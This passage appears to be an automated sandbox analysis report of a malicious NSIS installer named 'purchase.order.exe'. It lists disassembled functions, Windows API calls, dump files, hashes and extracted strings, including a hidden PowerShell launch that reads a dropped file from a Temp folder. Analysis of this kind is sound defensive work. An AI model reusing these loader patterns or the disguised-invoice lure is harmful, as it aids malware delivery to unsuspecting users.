4031a2-4031c2 442->444 444->404 446 4031c8-4031cc 444->446 445->388 447 4031d4-4031dc 446->447 448 4031ce-4031d2 446->448 447->417 449 4031de-4031e0 447->449 448->433 448->447 449->417
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 004030B3
                                          • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030CF
                                            • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                            • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040311B
                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                          Strings
                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403278
                                          • Inst, xrefs: 00403187
                                          • soft, xrefs: 00403190
                                          • Error launching installer, xrefs: 004030F2
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004030A9
                                          • Null, xrefs: 00403199
                                          • "C:\Users\user\Desktop\purchase.order.exe", xrefs: 004030A8
                                          • C:\Users\user\Desktop, xrefs: 004030FD, 00403102, 00403108
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                          • String ID: "C:\Users\user\Desktop\purchase.order.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                          • API String ID: 2803837635-1755445357
                                          • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                          • Instruction ID: 0f45a59523ef10b9f6d61eaf83b2f91e1f12d324a613ce28672a4e7bf9d48b30
                                          • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                          • Instruction Fuzzy Hash: 7B51B071A01304AFDB209F65DD86B9E7FACAB08356F20417BF504B62D1CB789E818B5D
                                          Function 0040657E Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 204stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 450 40657e-406587 451 406589-406598 450->451 452 40659a-4065b4 450->452 451->452 453 4067c4-4067ca 452->453 454 4065ba-4065c6 452->454 455 4067d0-4067dd 453->455 456 4065d8-4065e5 453->456 454->453 457 4065cc-4065d3 454->457 458 4067e9-4067ec 455->458 459 4067df-4067e4 call 406541 455->459 456->455 460 4065eb-4065f4 456->460 457->453 459->458 462 4067b1 460->462 463 4065fa-40663d 460->463 466 4067b3-4067bd 462->466 467 4067bf-4067c2 462->467 464 406643-40664f 463->464 465 406755-406759 463->465 468 406651 464->468 469 406659-40665b 464->469 470 40675b-406762 465->470 471 40678d-406791 465->471 466->453 467->453 468->469 474 406695-406698 469->474 475 40665d-406683 call 40640f 469->475 472 406772-40677e call 406541 470->472 473 406764-406770 call 406488 470->473 476 4067a1-4067af lstrlenW 471->476 477 406793-40679c call 40657e 471->477 486 406783-406789 472->486 473->486 481 40669a-4066a6 GetSystemDirectoryW 474->481 482 4066ab-4066ae 474->482 490 406689-406690 call 40657e 475->490 491 40673d-406740 475->491 476->453 477->476 487 406738-40673b 481->487 488 4066c0-4066c4 482->488 489 4066b0-4066bc GetWindowsDirectoryW 482->489 486->476 492 40678b 486->492 487->491 493 40674d-406753 call 4067ef 487->493 488->487 494 4066c6-4066e4 488->494 489->488 490->487 491->493 496 406742-406748 lstrcatW 491->496 492->493 493->476 498 4066e6-4066ec 494->498 499 4066f8-406710 call 406935 494->499 496->493 503 4066f4-4066f6 498->503 507 406712-406725 SHGetPathFromIDListW CoTaskMemFree 499->507 508 406727-406730 499->508 503->499 505 406732-406736 503->505 505->487 507->505 507->508 508->494 508->505
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066A0
                                          • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 004066B6
                                          • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406714
                                          • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040671D
                                          • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 00406748
                                          • lstrlenW.KERNEL32(: Completed,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 004067A2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                          • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$daniglacial$powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes
                                          • API String ID: 4024019347-1953292268
                                          • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                          • Instruction ID: 9d84e59ac7151f7caf92dcd2fae633819e279481621c74ff0a59597acd22528a
                                          • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                          • Instruction Fuzzy Hash: 46612471A047119BD7209F28DC80B7A77E4AF58328F65053FF686B32D0DA3C89A5875E
                                          Function 00401794 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 509 401794-4017b9 call 402dcb call 405e87 514 4017c3-4017d5 call 406541 call 405e10 lstrcatW 509->514 515 4017bb-4017c1 call 406541 509->515 520 4017da-4017db call 4067ef 514->520 515->520 524 4017e0-4017e4 520->524 525 4017e6-4017f0 call 40689e 524->525 526 401817-40181a 524->526 534 401802-401814 525->534 535 4017f2-401800 CompareFileTime 525->535 527 401822-40183e call 406031 526->527 528 40181c-40181d call 40600c 526->528 536 401840-401843 527->536 537 4018b2-4018db call 4055c6 call 4032d9 527->537 528->527 534->526 535->534 538 401894-40189e call 4055c6 536->538 539 401845-401883 call 406541 * 2 call 40657e call 406541 call 405ba1 536->539 551 4018e3-4018ef SetFileTime 537->551 552 4018dd-4018e1 537->552 549 4018a7-4018ad 538->549 539->524 571 401889-40188a 539->571 554 402c58 549->554 553 4018f5-401900 CloseHandle 551->553 552->551 552->553 556 401906-401909 553->556 557 402c4f-402c52 553->557 558 402c5a-402c5e 554->558 560 40190b-40191c call 40657e lstrcatW 556->560 561 40191e-401921 call 40657e 556->561 557->554 568 401926-4023c7 call 405ba1 560->568 561->568 568->558 575 402953-40295a 568->575 571->549 573 40188c-40188d 571->573 573->538 575->557
                                          APIs
                                          • lstrcatW.KERNEL32(00000000,00000000,32079,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Tilsmil,?,?,00000031), ref: 004017D5
                                          • CompareFileTime.KERNEL32(-00000014,?,32079,32079,00000000,00000000,32079,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Tilsmil,?,?,00000031), ref: 004017FA
                                            • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                            • Part of subcall function 004055C6: lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                            • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                            • Part of subcall function 004055C6: lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                            • Part of subcall function 004055C6: SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                            • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                            • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                            • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                          • String ID: 32079$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Tilsmil$hadefuldeste\optjeningers\hottish
                                          • API String ID: 1941528284-1431457882
                                          • Opcode ID: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                          • Instruction ID: 43cdcdb3dd666cfde73f7e2270c9ebc879cf542ec353fd5a36f292582218c0dc
                                          • Opcode Fuzzy Hash: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                          • Instruction Fuzzy Hash: 0141B431910604BACB117BA9DD86DBE3AB5EF45329F21427FF412B10E1CB3C8A91966D
                                          Function 004055C6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 576 4055c6-4055db 577 4055e1-4055f2 576->577 578 405692-405696 576->578 579 4055f4-4055f8 call 40657e 577->579 580 4055fd-405609 lstrlenW 577->580 579->580 581 405626-40562a 580->581 582 40560b-40561b lstrlenW 580->582 585 405639-40563d 581->585 586 40562c-405633 SetWindowTextW 581->586 582->578 584 40561d-405621 lstrcatW 582->584 584->581 587 405683-405685 585->587 588 40563f-405681 SendMessageW * 3 585->588 586->585 587->578 589 405687-40568a 587->589 588->587 589->578
                                          APIs
                                          • lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                          • lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                          • lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                          • SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                          • String ID: daniglacial
                                          • API String ID: 2531174081-766043870
                                          • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                          • Instruction ID: 832834c51e0bf9a0f82df7ca1b5cea98aaac4e2da268f37eaeed00ca70cd3c8d
                                          • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                          • Instruction Fuzzy Hash: BA21A175900558BACB119FA5DD84DCFBF79EF45350F50843AF904B22A0C77A4A41CF58
                                          Function 004032D9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 590 4032d9-4032f0 591 4032f2 590->591 592 4032f9-403301 590->592 591->592 593 403303 592->593 594 403308-40330d 592->594 593->594 595 40331d-40332a call 4034be 594->595 596 40330f-403318 call 4034d4 594->596 600 403330-403334 595->600 601 403475 595->601 596->595 602 40333a-40335a GetTickCount call 406a90 600->602 603 40345e-403460 600->603 604 403477-403478 601->604 616 4034b4 602->616 618 403360-403368 602->618 606 403462-403465 603->606 607 4034a9-4034ad 603->607 605 4034b7-4034bb 604->605 609 403467 606->609 610 40346a-403473 call 4034be 606->610 611 40347a-403480 607->611 612 4034af 607->612 609->610 610->601 624 4034b1 610->624 614 403482 611->614 615 403485-403493 call 4034be 611->615 612->616 614->615 615->601 627 403495-4034a1 call 4060e3 615->627 616->605 621 40336a 618->621 622 40336d-40337b call 4034be 618->622 621->622 622->601 628 403381-40338a 622->628 624->616 633 4034a3-4034a6 627->633 634 40345a-40345c 627->634 630 403390-4033ad call 406ab0 628->630 636 4033b3-4033ca GetTickCount 630->636 637 403456-403458 630->637 633->607 634->604 638 403415-403417 636->638 639 4033cc-4033d4 636->639 637->604 642 403419-40341d 638->642 643 40344a-40344e 638->643 640 4033d6-4033da 639->640 641 4033dc-40340d MulDiv wsprintfW call 4055c6 639->641 640->638 640->641 649 403412 641->649 646 403432-403438 642->646 647 40341f-403424 call 4060e3 642->647 643->618 644 403454 643->644 644->616 648 40343e-403442 646->648 652 403429-40342b 647->652 648->630 651 403448 648->651 649->638 651->616 652->634 653 40342d-403430 652->653 653->648
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CountTick$wsprintf
                                          • String ID: ... %d%%
                                          • API String ID: 551687249-2449383134
                                          • Opcode ID: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                          • Instruction ID: 37f968fffa50e4a1d2003f203ee40286d056d648d4267fa9fd8a089c231f80ea
                                          • Opcode Fuzzy Hash: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                          • Instruction Fuzzy Hash: 39517E71900219EBCB11DF65D944BAF3FA8AF40766F14417BF804BB2C1D7789E408BA9
                                          Function 004068C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 654 4068c5-4068e5 GetSystemDirectoryW 655 4068e7 654->655 656 4068e9-4068eb 654->656 655->656 657 4068fc-4068fe 656->657 658 4068ed-4068f6 656->658 660 4068ff-406932 wsprintfW LoadLibraryExW 657->660 658->657 659 4068f8-4068fa 658->659 659->660
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                          • wsprintfW.USER32 ref: 00406917
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                          • String ID: %s%S.dll$UXTHEME
                                          • API String ID: 2200240437-1106614640
                                          • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                          • Instruction ID: 5a11031caceee5166790be9fdf4905626ac305c011281564bfcfed8699633c36
                                          • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                          • Instruction Fuzzy Hash: 4FF0FC31501219A6CF10BB68DD0DF9B375C9B00304F10847EA546F10E0EB78D768C798
                                          Function 00406060 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 661 406060-40606c 662 40606d-4060a1 GetTickCount GetTempFileNameW 661->662 663 4060b0-4060b2 662->663 664 4060a3-4060a5 662->664 666 4060aa-4060ad 663->666 664->662 665 4060a7 664->665 665->666
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 0040607E
                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040351A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806), ref: 00406099
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                          • API String ID: 1716503409-386316673
                                          • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                          • Instruction ID: 6ac4114a0c6328616d68196ae331b9967fc339ed7b26ce04d623ba2336a1d7a6
                                          • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                          • Instruction Fuzzy Hash: D4F09076B40204BBEB00CF69ED05F9FB7ACEB95750F11803AFA01F7180E6B099548768
                                          Function 004015E6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 750 4015e6-4015fa call 402dcb call 405ebb 755 401656-401659 750->755 756 4015fc-40160f call 405e3d 750->756 758 401688-40231b call 401423 755->758 759 40165b-40167a call 401423 call 406541 SetCurrentDirectoryW 755->759 763 401611-401614 756->763 764 401629-40162c call 405aef 756->764 774 402c4f-402c5e 758->774 759->774 776 401680-401683 759->776 763->764 767 401616-40161d call 405b0c 763->767 773 401631-401633 764->773 767->764 782 40161f-401627 call 405a95 767->782 778 401635-40163a 773->778 779 40164c-401654 773->779 776->774 780 401649 778->780 781 40163c-401647 GetFileAttributesW 778->781 779->755 779->756 780->779 781->779 781->780 782->773
                                          APIs
                                            • Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\purchase.order.exe"), ref: 00405EC9
                                            • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                            • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                            • Part of subcall function 00405A95: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405AD7
                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Tilsmil,?,00000000,000000F0), ref: 00401672
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Tilsmil, xrefs: 00401665
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
